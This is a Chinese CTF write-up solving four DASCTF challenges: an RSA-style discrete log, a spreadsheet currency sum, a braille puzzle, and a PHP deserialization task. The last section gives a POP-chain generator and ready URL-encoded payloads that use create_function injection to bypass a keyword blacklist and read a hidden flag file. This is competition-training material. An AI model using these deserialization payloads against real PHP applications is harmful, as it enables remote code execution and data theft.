菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP_[dasctfxzhejiang]hellounser

1.签到

题目：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random
flag=b'flag{******************}'
n = 2 ** 256
e=bytes_to_long(flag)
m = random.randint(2, n-1) | 1
c = pow(m, e, n) #m mod(e)n
print('m = ' + str(m))
print('c = ' + str(c))
# m = 73964803637492582853353338913523546944627084372081477892312545091623069227301
# c = 21572244511100216966799370397791432119463715616349800194229377843045443048821
1
2
3
4
5
6
7
8
9
10
11
12
13

参考[网鼎杯 2020 青龙组]you_raise_me_up。

m = 73964803637492582853353338913523546944627084372081477892312545091623069227301
c = 21572244511100216966799370397791432119463715616349800194229377843045443048821
n = 2 ** 256
import sympy
flag=sympy.discrete_log(n,c,m)
import binascii
print(binascii.unhexlify(hex(flag)[2:]))
1
2
3
4
5
6
7

运行得flag{DASCTF_zjut}

2.Girlfriend’s account

大写金额转小写参考大佬的博客
这里需要先把账单里面的件数手动转成阿拉伯数字，然后把文件另存为xls。然后直接上python3代码：

# -*- coding: utf-8 -*-
import xlrd
def hantonum(str1):
    dict1 = {'壹': 1, '贰': 2, '叁': 3, '肆': 4, '伍': 5, '陆': 6, '柒': 7, '捌': 8, '玖': 9}
    dict2 = {'拾': 10, '佰': 100, '千': 1000, '万': 10000, '元': 1, '角': 0.1, '分': 0.01}
    result = 0
    for index,i in enumerate(str1):
        if index<len(str1)-1:
            if (i in dict1 and str1[index+1] in dict2) or (i in dict2 and str1[index+1]=='万'):
                if str1[index+1] !='万':
                    result += dict1[i] * dict2[str1[index+1]]
                elif i in dict2:
                    result *=10000
                else:
                    result += dict1[i]
                    result *= 10000
    return result
print(hantonum('壹佰壹拾玖元玖角玖分'))
workBook = xlrd.open_workbook('C:/Users/root/Desktop/1.xls');

sheet1_content1 = workBook.sheet_by_index(0); # sheet索引从0开始
# 4. 获取整行和整列的值（数组）
count = 0
for i in range(1,5001):
    rows = sheet1_content1.row_values(i)
    rows[0] = round(hantonum(rows[0]),2)
    count = count+(float(rows[0])*float(rows[1]))
print("flag{"+str(round(count,2))+"}")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

3.双目失明，身残志坚

改后缀之后解压得到两张图，盲水印提取：

这里开始还以为是空心、实心圆点表示二进制数。。。。搞了半天是盲文双拼，找个盲文拼音对照表：



两列一组，翻译出来zhejianggongyedaxue
包上flag就行。

4.hellounser

<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}
class B{
    public $func;
    public $arg;
    public function show(){
        $func = $this->func;
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) { 
            die('No!No!No!'); 
        } else { 
            include "flag.php";
            //There is no code to print flag in flag.php
            $func('', $this->arg); 
        }
    }
    public function __toString(){
        $this->show();
        return "<br>"."Nice Job!!"."<br>";
    }  
}
if(isset($_GET['pop'])){
    $aaa = unserialize($_GET['pop']);
    $aaa();
}
else{
    highlight_file(__FILE__);
}
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

这题参考BJDCTF2020]ezphp
构造poc:

<?php
class A {
    public $var;
}
class B{
    public $func;
    public $arg;
}
$a = new A();
$b = new B();
$a->var = $b;
$b->func = "create_function";
$b->arg = "}var_dump(get_defined_vars());//";
$ser = serialize($a);
echo(urlencode($ser));
// $aaa = unserialize($ser);
// $aaa();
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

得到exp:

O%3A1%3A%22A%22%3A1%3A%7Bs%3A3%3A%22var%22%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A15%3A%22create_function%22%3Bs%3A3%3A%22arg%22%3Bs%3A32%3A%22%7Dvar_dump%28get_defined_vars%28%29%29%3B%2F%2F%22%3B%7D%7D
1

传进去：

好特么气啊
继续构造poc:

<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}
class B{
    public $func;
    public $arg;
    
    public function show(){
        $func = $this->func;
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|echo|light|print|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) { 
            die('No!No!No!'); 
        } else {
            $func('', $this->arg);
        }
    }
    
    public function __toString(){
        $this->show();
        return "<br>"."Nice Job!!"."<br>";
    }
}
$a = new A();
$b = new B();
$a->var = $b;
$b->func = "create_function";
$b->arg = "}require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());//";
$ser = serialize($a);
echo(urlencode($ser));
// $aaa = unserialize($ser);
// $aaa();
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

得到exp:

O%3A1%3A%22A%22%3A1%3A%7Bs%3A3%3A%22var%22%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A15%3A%22create_function%22%3Bs%3A3%3A%22arg%22%3Bs%3A73%3A%22%7Drequire%28base64_decode%28VHJ1M2ZsYWcucGhw%29%29%3Bvar_dump%28get_defined_vars%28%29%29%3B%2F%2F%22%3B%7D%7D

1
2

传进去得到flag: